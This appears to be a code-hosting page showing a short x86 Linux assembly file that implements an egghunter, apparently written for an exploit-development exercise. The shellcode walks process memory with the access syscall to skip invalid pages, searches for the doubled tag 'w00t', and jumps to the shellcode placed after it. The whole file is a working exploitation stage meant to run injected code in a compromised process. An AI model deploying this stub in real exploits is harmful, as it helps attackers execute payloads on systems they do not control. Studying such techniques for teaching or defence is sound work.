Permalink
Cannot retrieve contributors at this time
| ; Info about egghunters: | |
| ; http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf | |
| ; code based on access(2) revisited egghunter | |
| global _start | |
| section .text | |
| _start: | |
| xor edx, edx ; XOR out EDX, this will contain the target address for access and egg evaluation | |
| incr_page: | |
| ; will always reset to xFFFF and gets incremeted in the next step | |
| or dx, 0xfff ; 4095, one less than the PAGE_SIZE - | |
| ; if stating from here, increasing edx means a PAGE_SIZE increment - 0xzfff becomes 0x(z+1)000 | |
| incr_addr: | |
| inc edx ; next address | |
| lea ebx, [edx+0x4] ; load edx+4 | |
| ;http://man7.org/linux/man-pages/man2/access.2.html | |
| push byte +0x21 ; access syscall | |
| pop eax ; access syscall | |
| int 0x80 ; | |
| cmp al,0xf2 ; 0xf2 - EFAULT aka invalid memory address (outside accessible address space) | |
| jz short incr_page ; invalid memory address, we can go a PAGE_SIZE up | |
| mov eax, 0x74303077 ; w00t | |
| mov edi, edx ; | |
| scasd ; search for the first instance of EAX (w00t) in EDI | |
| jnz short incr_addr | |
| scasd ; search for the second instance EAX (w00t) in EDI | |
| jnz short incr_addr | |
| jmp edi ; execute shellcode |